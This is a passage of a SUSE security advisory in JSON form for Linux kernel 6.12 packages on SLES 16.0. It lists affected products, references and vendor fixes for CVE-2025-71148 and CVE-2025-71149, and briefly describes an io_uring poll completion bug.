"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
